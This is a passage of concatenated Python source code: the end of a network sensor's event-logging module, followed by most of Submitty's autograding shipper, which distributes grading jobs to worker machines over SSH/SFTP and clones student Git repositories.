if any(_ in _thread_data.log_trails for _ in ((src_ip, trail), (dst_ip, trail))):
return
else:
_thread_data.log_trails.add((src_ip, trail))
_thread_data.log_trails.add((dst_ip, trail))
event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
if not config.DISABLE_LOCAL_LOG_STORAGE:
handle = get_event_log_handle(sec)
os.write(handle, event)
if config.LOG_SERVER:
remote_host, remote_port = config.LOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto("%s %s" % (sec, event), (remote_host, int(remote_port)))
if config.SYSLOG_SERVER:
extension = "src=%s spt=%s dst=%s dpt=%s trail=%s ref=%s" % (src_ip, src_port, dst_ip, dst_port, trail, reference)
_ = CEF_FORMAT.format(syslog_time=time.strftime("%b %d %H:%M:%S", time.localtime(int(sec))), host=HOSTNAME, device_vendor=NAME, device_product="sensor", device_version=VERSION, signature_id=time.strftime("%Y-%m-%d", time.localtime(os.path.getctime(TRAILS_FILE))), name=info, severity=0, extension=extension)
remote_host, remote_port = config.SYSLOG_SERVER.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(_, (remote_host, int(remote_port)))
if config.DISABLE_LOCAL_LOG_STORAGE and not any(config.LOG_SERVER, config.SYSLOG_SERVER) or config.console:
sys.stderr.write(event)
sys.stderr.flush()
if config.plugin_functions:
for _ in config.plugin_functions:
_(event_tuple, packet)
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def log_error(msg):
try:
handle = get_error_log_handle()
os.write(handle, "%s %s\n" % (time.strftime(TIME_FORMAT, time.localtime()), msg))
except (OSError, IOError):
if config.SHOW_DEBUG:
traceback.print_exc()
def start_logd(address=None, port=None, join=False):
class ThreadingUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
pass
class UDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
try:
data, _ = self.request
sec, event = data.split(" ", 1)
handle = get_event_log_handle(int(sec), reuse=False)
os.write(handle, event)
os.close(handle)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
server = ThreadingUDPServer((address, port), UDPHandler)
print "[i] running UDP server at '%s:%d'" % (server.server_address[0], server.server_address[1])
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
def set_sigterm_handler():
def handler(signum, frame):
log_error("SIGTERM")
raise SystemExit
if hasattr(signal, "SIGTERM"):
signal.signal(signal.SIGTERM, handler)
if __name__ != "__main__":
set_sigterm_handler()
|
submitty_autograding_shipper.py
|
#!/usr/bin/env python3
import os
import time
import signal
import json
import shutil
import contextlib
import datetime
import multiprocessing
from pathlib import Path
from submitty_utils import dateutils
import operator
import paramiko
import tempfile
import socket
import traceback
import subprocess
from autograder import autograding_utils
from autograder import packer_unpacker
CONFIG_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'config')
with open(os.path.join(CONFIG_PATH, 'submitty.json')) as open_file:
OPEN_JSON = json.load(open_file)
SUBMITTY_DATA_DIR = OPEN_JSON['submitty_data_dir']
SUBMITTY_INSTALL_DIR = OPEN_JSON['submitty_install_dir']
AUTOGRADING_LOG_PATH = OPEN_JSON['autograding_log_path']
AUTOGRADING_STACKTRACE_PATH = os.path.join(OPEN_JSON['site_log_path'], 'autograding_stack_traces')
with open(os.path.join(CONFIG_PATH, 'submitty_users.json')) as open_file:
OPEN_JSON = json.load(open_file)
DAEMON_UID = OPEN_JSON['daemon_uid']
INTERACTIVE_QUEUE = os.path.join(SUBMITTY_DATA_DIR, "to_be_graded_queue")
JOB_ID = '~SHIP~'
# ==================================================================================
def initialize(untrusted_queue):
"""
Initializer function for all our processes. We get one untrusted user off our queue which
we then set in our Process. We cannot recycle the shipper process as else the untrusted user
we set for this process will be lost.
:param untrusted_queue: multiprocessing.queues.Queue that contains all untrusted users left to
assign
"""
multiprocessing.current_process().untrusted = untrusted_queue.get()
# ==================================================================================
def add_fields_to_autograding_worker_json(autograding_worker_json, entry):
submitty_config = os.path.join(SUBMITTY_INSTALL_DIR, 'config', 'version.json')
try:
with open(submitty_config) as infile:
submitty_details = json.load(infile)
installed_commit = submitty_details['installed_commit']
most_recent_tag = submitty_details['most_recent_git_tag']
except FileNotFoundError as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())
raise SystemExit("ERROR, could not locate the submitty.json:", e)
autograding_worker_json[entry]['server_name'] = socket.getfqdn()
autograding_worker_json[entry]['primary_commit'] = installed_commit
autograding_worker_json[entry]['most_recent_tag'] = most_recent_tag
return autograding_worker_json
# ==================================================================================
def update_all_foreign_autograding_workers():
success_map = dict()
all_workers_json = os.path.join(SUBMITTY_INSTALL_DIR, 'config', "autograding_workers.json")
try:
with open(all_workers_json, 'r') as infile:
autograding_workers = json.load(infile)
except FileNotFoundError as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, trace=traceback.format_exc())
raise SystemExit("ERROR, could not locate autograding_workers_json :", e)
for key, value in autograding_workers.items():
if value['enabled'] == False:
continue
formatted_entry = {key: value}
formatted_entry = add_fields_to_autograding_worker_json(formatted_entry, key)
success = update_worker_json(key, formatted_entry)
success_map[key] = success
return success_map
# ==================================================================================
# Updates the autograding_worker.json in a workers autograding_TODO folder (tells it)
# how many threads to be running on startup.
def update_worker_json(name, entry):
fd, tmp_json_path = tempfile.mkstemp()
foreign_json = os.path.join(SUBMITTY_DATA_DIR, "autograding_TODO", "autograding_worker.json")
autograding_worker_to_ship = entry
try:
user = autograding_worker_to_ship[name]['username']
host = autograding_worker_to_ship[name]['address']
except Exception as e:
print("ERROR: autograding_workers.json entry for {0} is malformatted. {1}".format(e, name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: autograding_workers.json entry for {0} is malformed. {1}".format(e, name))
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
return False
#create a new temporary json with only the entry for the current machine.
with open(tmp_json_path, 'w') as outfile:
json.dump(autograding_worker_to_ship, outfile, sort_keys=True, indent=4)
#if we are updating the current machine, we can just move the new json to the appropriate spot (no ssh needed)
if host == "localhost":
try:
shutil.move(tmp_json_path,foreign_json)
print("Successfully updated local autograding_TODO/autograding_worker.json")
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Successfully updated local autograding_TODO/autograding_worker.json")
return True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not mv to local autograding_TODO/autograding_worker.json due to the following error: "+str(e))
print("ERROR: could not mv to local autograding_worker.json due to the following error: {0}".format(e))
return False
finally:
os.close(fd)
#if we are updating a foreign machine, we must connect via ssh and use sftp to update it.
else:
#try to establish an ssh connection to the host
try:
ssh = establish_ssh_connection(None, user, host, only_try_once = True)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not ssh to {0}@{1} due to following error: {2}".format(user, host,str(e)))
print("ERROR: could not ssh to {0}@{1} due to following error: {2}".format(user, host,str(e)))
return False
#try to copy the files over to the host
try:
sftp = ssh.open_sftp()
sftp.put(tmp_json_path,foreign_json)
sftp.close()
print("Successfully forwarded autograding_worker.json to {0}".format(name))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Successfully forwarded autograding_worker.json to {0}".format(name))
success = True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not sftp to foreign autograding_TODO/autograding_worker.json due to the following error: "+str(e))
print("ERROR: could sftp to foreign autograding_TODO/autograding_worker.json due to the following error: {0}".format(e))
success = False
finally:
os.close(fd)
os.remove(tmp_json_path)
sftp.close()
ssh.close()
return success
def establish_ssh_connection(my_name, user, host, only_try_once = False):
"""
Returns a connected paramiko ssh session.
Tries to connect until a connection is established, unless only_try_once
is set to true. If only_try_once is true, raise whatever connection error is thrown.
"""
connected = False
ssh = None
retry_delay = .1
while not connected:
ssh = paramiko.SSHClient()
ssh.get_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname = host, username = user, timeout=10)
connected = True
except:
if only_try_once:
raise
time.sleep(retry_delay)
retry_relay = min(10, retry_delay * 2)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=f"{my_name} Could not establish connection with {user}@{host} going to re-try.")
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
return ssh
# ==================================================================================
def prepare_job(my_name,which_machine,which_untrusted,next_directory,next_to_grade):
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: must be run by DAEMON_USER")
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
if which_machine == 'localhost':
address = which_machine
else:
address = which_machine.split('@')[1]
# prepare the zip files
try:
autograding_zip_tmp,submission_zip_tmp = packer_unpacker.prepare_autograding_and_submission_zip(which_machine,which_untrusted,next_directory,next_to_grade)
fully_qualified_domain_name = socket.getfqdn()
servername_workername = "{0}_{1}".format(fully_qualified_domain_name, address)
autograding_zip = os.path.join(SUBMITTY_DATA_DIR,"autograding_TODO",servername_workername+"_"+which_untrusted+"_autograding.zip")
submission_zip = os.path.join(SUBMITTY_DATA_DIR,"autograding_TODO",servername_workername+"_"+which_untrusted+"_submission.zip")
todo_queue_file = os.path.join(SUBMITTY_DATA_DIR,"autograding_TODO",servername_workername+"_"+which_untrusted+"_queue.json")
with open(next_to_grade, 'r') as infile:
queue_obj = json.load(infile)
queue_obj["which_untrusted"] = which_untrusted
queue_obj["which_machine"] = which_machine
queue_obj["ship_time"] = dateutils.write_submitty_date(microseconds=True)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: failed preparing submission zip or accessing next to grade "+str(e))
print("ERROR: failed preparing submission zip or accessing next to grade ", e)
return False
if address == "localhost":
try:
shutil.move(autograding_zip_tmp,autograding_zip)
shutil.move(submission_zip_tmp,submission_zip)
with open(todo_queue_file, 'w') as outfile:
json.dump(queue_obj, outfile, sort_keys=True, indent=4)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not move files due to the following error: "+str(e))
print("ERROR: could not move files due to the following error: {0}".format(e))
return False
else:
sftp = ssh = None
try:
user, host = which_machine.split("@")
ssh = establish_ssh_connection(my_name, user, host)
sftp = ssh.open_sftp()
sftp.put(autograding_zip_tmp,autograding_zip)
sftp.put(submission_zip_tmp,submission_zip)
with open(todo_queue_file, 'w') as outfile:
json.dump(queue_obj, outfile, sort_keys=True, indent=4)
sftp.put(todo_queue_file, todo_queue_file)
os.remove(todo_queue_file)
print("Successfully forwarded files to {0}".format(my_name))
success = True
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: could not move files due to the following error: "+str(e))
print("Could not move files due to the following error: {0}".format(e))
success = False
finally:
if sftp:
sftp.close()
if ssh:
ssh.close()
os.remove(autograding_zip_tmp)
os.remove(submission_zip_tmp)
return success
# log completion of job preparation
obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)
if "generate_output" not in obj:
partial_path = os.path.join(obj["gradeable"],obj["who"],str(obj["version"]))
item_name = os.path.join(obj["semester"],obj["course"],"submissions",partial_path)
elif obj["generate_output"]:
item_name = os.path.join(obj["semester"],obj["course"],"generated_output",obj["gradeable"])
is_batch = "regrade" in obj and obj["regrade"]
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted,
is_batch=is_batch, message="Prepared job for " + which_machine)
return True
# ==================================================================================
# ==================================================================================
def unpack_job(which_machine,which_untrusted,next_directory,next_to_grade):
# variables needed for logging
obj = packer_unpacker.load_queue_file_obj(JOB_ID,next_directory,next_to_grade)
if "generate_output" not in obj:
partial_path = os.path.join(obj["gradeable"],obj["who"],str(obj["version"]))
item_name = os.path.join(obj["semester"],obj["course"],"submissions",partial_path)
elif obj["generate_output"]:
item_name = os.path.join(obj["semester"],obj["course"],"generated_output")
is_batch = "regrade" in obj and obj["regrade"]
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: must be run by DAEMON_USER")
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
if which_machine == 'localhost':
address = which_machine
else:
address = which_machine.split('@')[1]
fully_qualified_domain_name = socket.getfqdn()
servername_workername = "{0}_{1}".format(fully_qualified_domain_name, address)
target_results_zip = os.path.join(SUBMITTY_DATA_DIR,"autograding_DONE",servername_workername+"_"+which_untrusted+"_results.zip")
target_done_queue_file = os.path.join(SUBMITTY_DATA_DIR,"autograding_DONE",servername_workername+"_"+which_untrusted+"_queue.json")
if which_machine == "localhost":
if not os.path.exists(target_done_queue_file):
return False
else:
local_done_queue_file = target_done_queue_file
local_results_zip = target_results_zip
else:
ssh = sftp = fd1 = fd2 = local_done_queue_file = local_results_zip = None
try:
user, host = which_machine.split("@")
ssh = establish_ssh_connection(which_machine, user, host)
sftp = ssh.open_sftp()
fd1, local_done_queue_file = tempfile.mkstemp()
fd2, local_results_zip = tempfile.mkstemp()
#remote path first, then local.
sftp.get(target_done_queue_file, local_done_queue_file)
sftp.get(target_results_zip, local_results_zip)
#Because get works like cp rather tnan mv, we have to clean up.
sftp.remove(target_done_queue_file)
sftp.remove(target_results_zip)
success = True
#This is the normal case (still grading on the other end) so we don't need to print anything.
except (socket.timeout, TimeoutError) as e:
success = False
except FileNotFoundError:
# Remove results files
for var in [local_results_zip, local_done_queue_file]:
if var:
with contextlib.suppress(FileNotFoundError):
os.remove(var)
success = False
#In this more general case, we do want to print what the error was.
#TODO catch other types of exception as we identify them.
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="ERROR: Could not retrieve the file from the foreign machine "+str(e))
print("ERROR: Could not retrieve the file from the foreign machine.\nERROR: {0}".format(e))
# Remove results files
for var in [local_results_zip, local_done_queue_file]:
if var:
with contextlib.suppress(FileNotFoundError):
os.remove(var)
success = False
finally:
# Close SSH connections
for var in [sftp, ssh]:
if var:
var.close()
# Close file descriptors
for var in [fd1, fd2]:
if var:
try:
os.close(var)
except Exception:
pass
if not success:
return False
# archive the results of grading
try:
success = packer_unpacker.unpack_grading_results_zip(which_machine,which_untrusted,local_results_zip)
except:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID,jobname=item_name,message="ERROR: Exception when unpacking zip. For more details, see traces entry.")
with contextlib.suppress(FileNotFoundError):
os.remove(local_results_zip)
success = False
with contextlib.suppress(FileNotFoundError):
os.remove(local_done_queue_file)
msg = "Unpacked job from " + which_machine if success else "ERROR: failure returned from worker machine"
print(msg)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, jobname=item_name, which_untrusted=which_untrusted, is_batch=is_batch, message=msg)
return True
# ==================================================================================
def grade_queue_file(my_name, which_machine,which_untrusted,queue_file):
"""
Oversees the autograding of single item from the queue
:param queue_file: details of what to grade
:param which_machine: name of machine to send this job to (might be "localhost")
:param which_untrusted: specific untrusted user for this autograding job
"""
my_dir,my_file=os.path.split(queue_file)
pid = os.getpid()
directory = os.path.dirname(os.path.realpath(queue_file))
name = os.path.basename(os.path.realpath(queue_file))
grading_file = os.path.join(directory, "GRADING_" + name)
#TODO: break which_machine into id, address, and passphrase.
try:
# prepare the job
shipper_counter=0
#prep_job_success = prepare_job(my_name,which_machine, which_untrusted, my_dir, queue_file)
while not prepare_job(my_name,which_machine, which_untrusted, my_dir, queue_file):
time.sleep(5)
prep_job_success = True
if not prep_job_success:
print (my_name, " ERROR unable to prepare job: ", queue_file)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR unable to prepare job: " + queue_file)
else:
# then wait for grading to be completed
shipper_counter=0
while not unpack_job(which_machine, which_untrusted, my_dir, queue_file):
shipper_counter+=1
time.sleep(1)
if shipper_counter >= 10:
print (my_name,which_untrusted,"shipper wait for grade: ",queue_file)
shipper_counter=0
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print (my_name, " ERROR attempting to grade item: ", queue_file, " exception=",str(e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR attempting to grade item: " + queue_file + " exception " + repr(e))
# note: not necessary to acquire lock for these statements, but
# make sure you remove the queue file, then the grading file
try:
os.remove(queue_file)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print (my_name, " ERROR attempting to remove queue file: ", queue_file, " exception=",str(e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR attempting to remove queue file: " + queue_file + " exception=" + str(e))
try:
os.remove(grading_file)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
print (my_name, " ERROR attempting to remove grading file: ", grading_file, " exception=",str(e))
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" ERROR attempting to remove grading file: " + grading_file + " exception=" + str(e))
# ==================================================================================
# ==================================================================================
def valid_github_user_id(userid):
# Github username may only contain alphanumeric characters or
# hyphens. Github username cannot have multiple consecutive
# hyphens. Github username cannot begin or end with a hyphen.
# Maximum is 39 characters.
#
# NOTE: We only scrub the input for allowed characters.
if (userid==''):
# GitHub userid cannot be empty
return False
checklegal = lambda char: char.isalnum() or char == '-'
filtered_userid = ''.join(list(filter(checklegal,userid)))
if not userid == filtered_userid:
return False
return True
def valid_github_repo_id(repoid):
# Only characters, numbers, dots, minus and underscore are allowed.
if (repoid==''):
# GitHub repoid cannot be empty
return False
checklegal = lambda char: char.isalnum() or char == '.' or char == '-' or char == '_'
filtered_repoid = ''.join(list(filter(checklegal,repoid)))
if not repoid == filtered_repoid:
return False
return True
def checkout_vcs_repo(my_file):
print ("SHIPPER CHECKOUT VCS REPO ", my_file)
with open(my_file, 'r') as infile:
obj = json.load(infile)
partial_path = os.path.join(obj["gradeable"],obj["who"],str(obj["version"]))
course_dir = os.path.join(SUBMITTY_DATA_DIR, "courses", obj["semester"], obj["course"])
submission_path = os.path.join(course_dir, "submissions", partial_path)
checkout_path = os.path.join(course_dir, "checkout", partial_path)
results_path = os.path.join(course_dir, "results", partial_path)
is_vcs,vcs_type,vcs_base_url,vcs_subdirectory = packer_unpacker.get_vcs_info(SUBMITTY_DATA_DIR,obj["semester"],obj["course"],obj["gradeable"],obj["who"],obj["team"])
# cleanup the previous checkout (if it exists)
shutil.rmtree(checkout_path,ignore_errors=True)
os.makedirs(checkout_path, exist_ok=True)
job_id = "~VCS~"
try:
# If we are public or private github, we will have an empty vcs_subdirectory
if vcs_subdirectory == '':
with open (os.path.join(submission_path,".submit.VCS_CHECKOUT")) as submission_vcs_file:
VCS_JSON = json.load(submission_vcs_file)
git_user_id = VCS_JSON["git_user_id"]
git_repo_id = VCS_JSON["git_repo_id"]
if not valid_github_user_id(git_user_id):
raise Exception ("Invalid GitHub user/organization name: '"+git_user_id+"'")
if not valid_github_repo_id(git_repo_id):
raise Exception ("Invalid GitHub repository name: '"+git_repo_id+"'")
# construct path for GitHub
vcs_path="https://www.github.com/"+git_user_id+"/"+git_repo_id
# is vcs_subdirectory standalone or should it be combined with base_url?
elif vcs_subdirectory[0] == '/' or '://' in vcs_subdirectory:
vcs_path = vcs_subdirectory
else:
if '://' in vcs_base_url:
vcs_path = urllib.parse.urljoin(vcs_base_url, vcs_subdirectory)
else:
vcs_path = os.path.join(vcs_base_url, vcs_subdirectory)
# warning: --depth is ignored in local clones; use file:// instead.
if not '://' in vcs_path:
vcs_path = "file:///" + vcs_path
Path(results_path+"/logs").mkdir(parents=True, exist_ok=True)
checkout_log_file = os.path.join(results_path, "logs", "vcs_checkout.txt")
# grab the submission time
with open (os.path.join(submission_path,".submit.timestamp")) as submission_time_file:
submission_string = submission_time_file.read().rstrip()
# OPTION: A shallow clone with only the most recent commit
# from the submission timestamp.
#
# NOTE: if the student has set their computer time in the
# future, they could be confused that we don't grab their
# most recent code.
# NOTE: github repos currently fail (a bug?) with an error when
# --shallow-since is used:
# "fatal: The remote end hung up unexpectedly"
#
#clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--shallow-since='+submission_string, '-b', 'master']
# OPTION: A shallow clone, with just the most recent commit.
#
# NOTE: If the server is busy, it might take seconds or
# minutes for an available shipper to process the git
# clone, and thethe timestamp might be slightly late)
#
# So we choose this option! (for now)
#
clone_command = ['/usr/bin/git', 'clone', vcs_path, checkout_path, '--depth', '1', '-b', 'master']
with open(checkout_log_file, 'a') as f:
print("VCS CHECKOUT", file=f)
print('vcs_base_url', vcs_base_url, file=f)
print('vcs_subdirectory', vcs_subdirectory, file=f)
print('vcs_path', vcs_path, file=f)
print(' '.join(clone_command), file=f)
print("\n====================================\n", file=f)
# git clone may fail -- because repository does not exist,
# or because we don't have appropriate access credentials
try:
subprocess.check_call(clone_command)
os.chdir(checkout_path)
# determine which version we need to checkout
# if the repo is empty or the master branch does not exist, this command will fail
try:
what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', 'master'])
# old method: when we had the full history, roll-back to a version by date
#what_version = subprocess.check_output(['git', 'rev-list', '-n', '1', '--before="'+submission_string+'"', 'master'])
what_version = str(what_version.decode('utf-8')).rstrip()
if what_version == "":
# oops, pressed the grade button before a valid commit
shutil.rmtree(checkout_path, ignore_errors=True)
# old method:
#else:
# # and check out the right version
# subprocess.call(['git', 'checkout', '-b', 'grade', what_version])
subprocess.call(['ls', '-lR', checkout_path], stdout=open(checkout_log_file, 'a'))
print("\n====================================\n", file=open(checkout_log_file, 'a'))
subprocess.call(['du', '-skh', checkout_path], stdout=open(checkout_log_file, 'a'))
obj['revision'] = what_version
# exception on git rev-list
except subprocess.CalledProcessError as error:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message="ERROR: failed to determine version on master branch " + str(error))
os.chdir(checkout_path)
with open(os.path.join(checkout_path,"failed_to_determine_version_on_master_branch.txt"),'w') as f:
print(str(error),file=f)
print("\n",file=f)
print("Check to be sure the repository is not empty.\n",file=f)
print("Check to be sure the repository has a master branch.\n",file=f)
print("And check to be sure the timestamps on the master branch are reasonable.\n",file=f)
# exception on git clone
except subprocess.CalledProcessError as error:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message="ERROR: failed to clone repository " + str(error))
os.chdir(checkout_path)
with open(os.path.join(checkout_path,"failed_to_clone_repository.txt"),'w') as f:
print(str(error),file=f)
print("\n",file=f)
print("Check to be sure the repository exists.\n",file=f)
print("And check to be sure the submitty_daemon user has appropriate access credentials.\n",file=f)
# exception in constructing full git repository url/path
except Exception as error:
autograding_utils.log_message(AUTOGRADING_LOG_PATH, job_id,message="ERROR: failed to construct valid repository url/path" + str(error))
os.chdir(checkout_path)
with open(os.path.join(checkout_path,"failed_to_construct_valid_repository_url.txt"),'w') as f:
print(str(error),file=f)
print("\n",file=f)
print("Check to be sure the repository exists.\n",file=f)
print("And check to be sure the submitty_daemon user has appropriate access credentials.\n",file=f)
return obj
# ==================================================================================
def get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock):
"""
Picks a job from the queue
:param overall_lock: a lock on the directory containing all queue files
"""
time_get_job_begin = dateutils.get_current_time()
with overall_lock:
folder= INTERACTIVE_QUEUE
'''
----------------------------------------------------------------
Our first priority is to perform any awaiting VCS checkouts
Note: This design is imperfect:
* If all shippers are busy working on long-running autograding
tasks there will be a delay of seconds or minutes between
a student pressing the submission button and clone happening.
This is a minor exploit allowing them to theoretically
continue working on their submission past the deadline for
the time period of the delay.
-- This is not a significant, practical problem.
* If multiple and/or large git submissions arrive close
together, this shipper job will be tied up performing these
clone operations. Because we don't release the lock, any
other shippers that complete their work will also be blocked
from either helping with the clones or tackling the next
autograding job.
-- Based on experience with actual submission patterns, we
do not anticipate that this will be a significant
bottleneck at this time.
* If a git clone takes a very long time and/or hangs because of
network problems, this could halt all work on the server.
-- We'll need to monitor the production server.
We plan to do a complete overhaul of the
scheduler/shipper/worker and refactoring this design should be
part of the project.
----------------------------------------------------------------
'''
# Grab all the VCS files currently in the folder...
vcs_files = [str(f) for f in Path(folder).glob('VCS__*')]
for f in vcs_files:
vcs_file = f[len(folder)+1:]
no_vcs_file = f[len(folder)+1+5:]
# do the checkout
updated_obj = checkout_vcs_repo(folder+"/"+vcs_file)
# save the regular grading queue file
with open(os.path.join(folder,no_vcs_file), "w") as queue_file:
json.dump(updated_obj, queue_file)
# cleanup the vcs queue file
os.remove(folder+"/"+vcs_file)
# ----------------------------------------------------------------
# Grab all the files currently in the folder, sorted by creation
# time, and put them in the queue to be graded
files = [str(f) for f in Path(folder).glob('*')]
files_and_times = list()
for f in files:
try:
my_time = os.path.getctime(f)
except:
continue
tup = (f, my_time)
files_and_times.append(tup)
files_and_times = sorted(files_and_times, key=operator.itemgetter(1))
my_job=""
for full_path_file, file_time in files_and_times:
# get the file name (without the path)
just_file = full_path_file[len(folder)+1:]
# skip items that are already being graded
if (just_file[0:8]=="GRADING_"):
continue
grading_file = os.path.join(folder,"GRADING_"+just_file)
if grading_file in files:
continue
# skip items (very recently added!) that are already waiting for a VCS checkout
if (just_file[0:5]=="VCS__"):
continue
# found something to do
try:
with open(full_path_file, 'r') as infile:
queue_obj = json.load(infile)
except:
continue
#Check to make sure that we are capable of grading this submission
required_capabilities = queue_obj["required_capabilities"]
if not required_capabilities in my_capabilities:
continue
# prioritize interactive jobs over (batch) regrades
# if you've found an interactive job, exit early (since they are sorted by timestamp)
if not "regrade" in queue_obj or not queue_obj["regrade"]:
my_job = just_file
break
# otherwise it's a regrade, and if we don't already have a
# job, take it, but we have to search the rest of the list
if my_job == "":
my_job = just_file
if not my_job == "":
grading_file = os.path.join(folder, "GRADING_" + my_job)
# create the grading file
with open(os.path.join(grading_file), "w") as queue_file:
json.dump({"untrusted": which_untrusted, "machine": which_machine}, queue_file)
time_get_job_end = dateutils.get_current_time()
time_delta = time_get_job_end-time_get_job_begin
if time_delta > datetime.timedelta(milliseconds=100):
print (my_name, " WARNING: submitty_autograding shipper get_job time ", time_delta)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=str(my_name)+" WARNING: submitty_autograding shipper get_job time "+str(time_delta))
return (my_job)
# ==================================================================================
# ==================================================================================
def shipper_process(my_name,my_data,full_address,which_untrusted,overall_lock):
"""
Each shipper process spins in a loop, looking for a job that
matches the capabilities of this machine, and then oversees the
autograding of that job. Interactive jobs are prioritized over
batch (regrade) jobs. If no jobs are available, the shipper waits
on an event editing one of the queues.
"""
which_machine = full_address
my_capabilities = my_data[my_name]['capabilities']
# ignore keyboard interrupts in the shipper processes
signal.signal(signal.SIGINT, signal.SIG_IGN)
counter=0
while True:
try:
my_job = get_job(my_name,which_machine,my_capabilities,which_untrusted,overall_lock)
if not my_job == "":
counter=0
grade_queue_file(my_name,which_machine,which_untrusted,os.path.join(INTERACTIVE_QUEUE,my_job))
continue
else:
if counter == 0 or counter >= 10:
print ("{0} {1}: no available job".format(my_name, which_untrusted))
counter=0
counter+=1
time.sleep(1)
except Exception as e:
autograding_utils.log_stack_trace(AUTOGRADING_STACKTRACE_PATH, job_id=JOB_ID, trace=traceback.format_exc())
my_message = "ERROR in get_job {0} {1} {2}. For more details, see traces entry".format(which_machine,which_untrusted,str(e))
print (my_message)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message=my_message)
time.sleep(1)
# ==================================================================================
# ==================================================================================
def launch_shippers(worker_status_map):
# verify the DAEMON_USER is running this script
if not int(os.getuid()) == int(DAEMON_UID):
raise SystemExit("ERROR: the submitty_autograding_shipper.py script must be run by the DAEMON_USER")
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="grade_scheduler.py launched")
# Clean up old files from previous shipping/autograding (any
# partially completed work will be re-done)
for file_path in Path(INTERACTIVE_QUEUE).glob("GRADING_*"):
file_path = str(file_path)
autograding_utils.log_message(AUTOGRADING_LOG_PATH, JOB_ID, message="Remove old queue file: " + file_path)
os.remove(file_path)
for file_path in Path(SUBMITTY_DATA_DIR, "autograding_TODO").glob("untrusted*"):
